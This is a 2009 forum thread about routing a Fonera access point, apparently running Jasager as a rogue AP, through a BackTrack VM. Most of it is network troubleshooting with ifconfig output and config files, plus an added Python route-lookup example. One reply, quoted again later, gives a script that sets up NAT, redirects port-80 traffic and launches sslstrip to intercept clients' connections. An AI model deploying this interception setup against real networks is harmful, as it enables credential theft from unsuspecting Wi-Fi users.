VMWare Backtrack and Fonera 2201
rosbif
post Wed, 23 Dec 2009 13:01:16 +0000
Post #1





Hi there,

I've spent the best part of the day searching through the site and googling for help, before deciding to bother you all with this. Excuse the newbie questions.

I'm running backtrack in a vmware and want to set up the fonera to run through this. I got it set up through windows with ICS fine, but am having issues with the backtrack set up. Primarily because of the networking side of things through the VMWare.

The route I'm expecting is

Fonera -> VMWare Backtrack -> Windows box -> Internet (I think this is right)

Here are some bits of network info.

1. Home network 192.168.0.0/24
2. Backtrack network through VMWare 192.168.124.0/24

3. Fonera IP address : 192.168.1.1
4. Internet gateway : 192.168.0.100
5. VMWare eth0 : 192.168.124.128
6. VMWare adapter (Windows host side) : 192.168.124.10
7. IP address of Windows box 192.168.0.102

VMware ifconfig:

eth0 Link encap:Ethernet HWaddr 00:0c:29:f7:56:e2
inet addr:192.168.124.128 Bcast:192.168.124.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fef7:56e2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:39225 errors:0 dropped:0 overruns:0 frame:0
TX packets:34972 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24833456 (24.8 MB) TX bytes:3821384 (3.8 MB)
Interrupt:18 Base address:0x1080

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:392 errors:0 dropped:0 overruns:0 frame:0
TX packets:392 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19600 (19.6 KB) TX bytes:19600 (19.6 KB)

Fonera ifconfig:

ath0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F9
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:748 errors:0 dropped:44 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:295263 (288.3 KiB)

br-lan Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:258665 (252.6 KiB) TX bytes:267270 (261.0 KiB)

eth0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
TX packets:3402 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:302185 (295.1 KiB) TX bytes:569405 (556.0 KiB)
Interrupt:255 Base address:0x1000

eth0.0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:258665 (252.6 KiB) TX bytes:267270 (261.0 KiB)

eth0.1 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:728 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:292656 (285.7 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:12 errors:0 dropped:0 overruns:0 frame:0
TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:720 (720.0 B) TX bytes:720 (720.0 B)

wifi0 Link encap:UNSPEC HWaddr 00-18-84-A5-85-F9-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22471 errors:0 dropped:0 overruns:0 frame:689
TX packets:2836 errors:485 dropped:0 overruns:0 carrier:0

root@RogueAP:~# brctl show
bridge name     bridge id               STP enabled     interfaces
br-lan          8000.001884a585f8       no              ath0
                                                        eth0.0

fonera /etc/config/network:

config 'interface' 'loopback'
option 'ifname' 'lo'
option 'proto' 'static'
option 'ipaddr' '127.0.0.1'
option 'netmask' '255.0.0.0'

config 'interface' 'lan'
option 'type' 'bridge'
option 'ipaddr' '192.168.1.1'
option 'netmask' '255.255.255.0'
option 'ifname' 'eth0.0'
option 'dns' '8.8.8.8 8.8.4.4'
option 'proto' 'static'
option 'macaddr' ''
option 'ip6addr' ''
option 'ip6gw' ''
option 'gateway' ''

config 'interface' 'wan'
option 'ifname' 'eth0.1'
option 'macaddr' ''
option 'ip6addr' ''
option 'netmask' ''
option 'gateway' '192.168.0.100'
option 'ip6gw' ''
option 'dns' ''
option 'proto' 'dhcp'
option 'ipaddr' ''

config 'interface' 'wifi'
option 'ifname' 'ath0'
option 'proto' 'dhcp'
option 'macaddr' ''
option 'ipaddr' ''
option 'ip6addr' ''
option 'netmask' ''
option 'gateway' ''
option 'ip6gw' ''
option 'dns' ''

fonera /etc/config/dhcp

config 'dnsmasq'
option 'domainneeded' '1'
option 'boguspriv' '1'
option 'filterwin2k' '0'
option 'localise_queries' '1'
option 'local' '/lan/'
option 'domain' 'lan'
option 'expandhosts' '1'
option 'nonegcache' '0'
option 'authoritative' '1'
option 'readethers' '1'
option 'leasefile' '/tmp/dhcp.leases'
option 'resolvfile' '/tmp/resolv.conf.auto'

config 'dhcp' 'lan'
option 'interface' 'lan'
option 'start' '100'
option 'limit' '150'
option 'leasetime' '12h'
list 'dhcp_option' '3,192.168.0.100'

config 'dhcp' 'wan'
option 'interface' 'wan'
option 'ignore' '1'

config 'host'
option 'name' 'BackTrackBox'
option 'ip' '192.168.0.102'

config 'dhcp' 'cfg0875fa'
option 'start' '2'
option 'limit' '250'
option 'leasetime' '60m'
option 'ignore' '0'
option 'interface' 'wifi'

Now I can access the internet through the VMWare, no problems, but through the fonera I can't even ping IP addresses.

root@RogueAP:/etc/config# ping 192.168.0.100
PING 192.168.0.100 (192.168.0.100): 56 data bytes
ping: sendto: Network is unreachable
root@RogueAP:/etc/config# ping 192.168.124.128
PING 192.168.124.128 (192.168.124.128): 56 data bytes
ping: sendto: Network is unreachable

I'm sure I've screwed something up. Can anyone give me any clues/help please?

TIA,

Neil
Psychosis
post Wed, 23 Dec 2009 18:36:36 +0000
Post #2





Firstly, you don't need ICS enabled on the windows box.

You also have what appears to be a complete salad of IP addresses.

Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network.

The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used.

Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\.

So on your VM, you should have 2 virtual NICs. bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network.

Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to setup DNS.

Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE. I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip:

CODE
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0
sudo dhclient eth0
python sslstrip.py -l 64123 -f lock.ico


(eth1 is Fon network, eth0 is home network.)

If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done.


--------------------
"Why is it 'marketing' when a company helps itself to my information against my will and 'piracy' or 'industrial espionage' if I helped myself to THEIR information against their will ?"
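
Added example, not part of the original thread: a simplified route lookup in Python that shows why the Fonera's pings in post #1 fail with "Network is unreachable" and why the layout in post #2 routes. The Fon's 172.20.182.2 address and the VM's eth0 address are assumptions; the thread only gives 172.20.182.1 for the VM's eth1.

```python
import ipaddress

def on_link(dst, interfaces):
    """Name of the interface whose subnet contains dst (longest prefix wins), else None."""
    ip = ipaddress.ip_address(dst)
    best = None
    for name, cidr in interfaces.items():
        net = ipaddress.ip_interface(cidr).network
        if ip in net and (best is None or net.prefixlen > best[1]):
            best = (name, net.prefixlen)
    return best[0] if best else None

def route(dst, interfaces, default_gw=None):
    """Simplified route lookup: directly connected subnet first, then the default
    gateway, which only counts if the gateway itself is on a connected subnet."""
    ifname = on_link(dst, interfaces)
    if ifname:
        return ("direct", ifname)
    gw_if = on_link(default_gw, interfaces) if default_gw else None
    if gw_if:
        return ("via " + default_gw, gw_if)
    return ("unreachable", None)   # what ping reports as "Network is unreachable"

# Fonera as posted: only br-lan (and lo) carry an IPv4 address in the ifconfig output.
FON_AS_POSTED = {"lo": "127.0.0.1/8", "br-lan": "192.168.1.1/24"}
# Layout from the reply. The Fon's .2 address and the VM's eth0 lease are
# assumptions; the thread only gives 172.20.182.1 for the VM's eth1.
FON_REPLANNED = {"lo": "127.0.0.1/8", "br-lan": "172.20.182.2/24"}
VM_GATEWAY = {"eth0": "192.168.0.50/24", "eth1": "172.20.182.1/24"}

if __name__ == "__main__":
    for label, dst, ifs, gw in [
        ("fon, as posted", "192.168.0.100", FON_AS_POSTED, "192.168.0.100"),
        ("fon, as posted", "192.168.124.128", FON_AS_POSTED, "192.168.0.100"),
        ("fon, replanned", "192.168.0.100", FON_REPLANNED, "172.20.182.1"),
        ("vm gateway", "172.20.182.2", VM_GATEWAY, "192.168.0.100"),
        ("vm gateway", "8.8.8.8", VM_GATEWAY, "192.168.0.100"),
    ]:
        print(f"{label:15} -> {dst:16} {route(dst, ifs, gw)}")
```

The first two lookups come back unreachable because the configured gateway 192.168.0.100 is not on any subnet the Fonera has an address in, so it cannot be used as a next hop.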
rosbif
post Thu, 24 Dec 2009 03:49:57 +0000
Post #3





QUOTE (Psychosis @ Thu, 24 Dec 2009 00:36:36 +0000) *
Firstly, you don't need ICS enabled on the windows box.

Y'know, I try to be clear in my posts so I can get my message across and I still screw it up. I meant to say that I'd tested my setup using Windows ICS, just to see if I could get it all working. Now my aim is to do the same in the VMWare session.

QUOTE (Psychosis @ Thu, 24 Dec 2009 00:36:36 +0000) *
You also have what appears to be a complete salad of IP addresses.

I know. Having the VMWare session just threw me completely.

QUOTE (Psychosis @ Thu, 24 Dec 2009 00:36:36 +0000) *
Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network.

The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used.

Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\.

So on your VM, you should have 2 virtual NICs. bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network.

Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to setup DNS.

Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE. I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip:

CODE
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0
sudo dhclient eth0
python sslstrip.py -l 64123 -f lock.ico


(eth1 is Fon network, eth0 is home network.)

If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done.


Lovely stuff, thanks very much for your input on this. I'll report back later on.

Neil
rosbif
post Sat, 26 Dec 2009 18:36:07 +0000
Post #4





QUOTE (rosbif @ Thu, 24 Dec 2009 09:49:57 +0000) *
Lovely stuff, thanks very much for your input on this. I'll report back later on.

Neil


Dunno if it's bad form to reply to your own posts, but I played around with the settings as described above, and aside from a bit of VMWare network tweaking, it worked fine. Thanks very much for your help.

N
Psychosis
post Sat, 26 Dec 2009 20:07:32 +0000
Post #5





No problem.

